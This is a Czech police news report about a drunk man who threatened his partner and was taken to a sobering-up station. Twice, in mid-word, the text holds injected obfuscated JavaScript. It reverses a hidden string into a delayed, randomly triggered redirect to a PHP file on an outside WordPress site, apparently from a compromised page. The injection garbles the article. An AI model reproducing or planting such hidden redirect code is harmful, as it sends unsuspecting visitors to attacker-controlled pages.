Rainbow page separator

Vyhrožoval družce, skončil na záchytce s téměř třemi promile

Čtvrtek, 19. ledna 2017

Policie České republiky

Bystřicko / Policisté z bystřického obvodního oddělení vyjížděli k pětapadesátiletému muži, který v časných odpoledních hodinách v jedné z obcí na Bystřicku slovně napadal svoji čtyřicetile[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou družku a vyhrožoval jí újmou na zdraví.
„Policisté na místě události zjistili, že muž je silně pod vlivem alkoholu, a hrozilo, že ve svém jednání bude pokračovat. Pro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to ho zajistili a převezli do protialkoholní záchytné stanice k vystřízlivění. Policisté mu při dechové zkoušce naměřili 2,82 promile alkoholu,“ informoval o události David Linhart z oddělení tisku a prevence krajského policejního ředitelství.
Svým jednáním se muž podle sdělení policistů dopustil přestupku proti občanskému soužití, který následně bude projednávat příslušný správní orgán. Muži může být v souvislosti s jeho jednáním uložena pokuta v řádu několika tisíc korun.